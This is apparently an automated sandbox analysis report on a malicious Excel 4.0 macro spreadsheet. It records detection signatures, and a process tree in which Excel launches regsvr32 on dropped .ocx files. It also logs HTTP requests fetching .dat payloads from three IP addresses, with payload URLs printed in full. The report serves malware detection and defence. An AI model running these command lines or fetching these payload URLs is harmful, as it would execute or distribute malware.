Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ClaimCopy-1848214335-12022021.xlsb

Overview

General Information

Sample Name:ClaimCopy-1848214335-12022021.xlsb
Analysis ID:532757
MD5:08dbf91f6a89fdb8dcd18dfe657147f3
SHA1:990b5abe4b156c201174e412aca4b3dcb372070c
SHA256:29db2ea5fcb6ab8fca34ee80ae3a9c2ebda224ee631d754208ec53bc2b610267
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected potential crypto function
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5116 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 5784 cmdline: regsvr32 C:\ProgramData\Volet1.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4000 cmdline: regsvr32 C:\ProgramData\Volet2.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5216 cmdline: regsvr32 C:\ProgramData\Volet3.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3412 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3108 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 5344 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5116, ProcessCommandLine: regsvr32 C:\ProgramData\Volet1.ocx, ProcessId: 5784

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: ClaimCopy-1848214335-12022021.xlsbVirustotal: Detection: 8%Perma Link
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Source: global trafficTCP traffic: 192.168.2.3:49746 -> 185.82.126.78:80
    Source: global trafficTCP traffic: 192.168.2.3:49746 -> 185.82.126.78:80
    Source: global trafficHTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /337591964609.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /337591964609.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
    Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
    Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:13 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:13 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 16:29:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://158.69.133.78/337591964609.dat
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://158.69.133.78/337591964609.dat24
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://158.69.133.78/337591964609.dat2e
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://158.69.133.78/337591964609.datQ
    Source: EXCEL.EXE, 00000000.00000003.413539859.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413742220.0000000012F33000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/
    Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/337591964609.dat
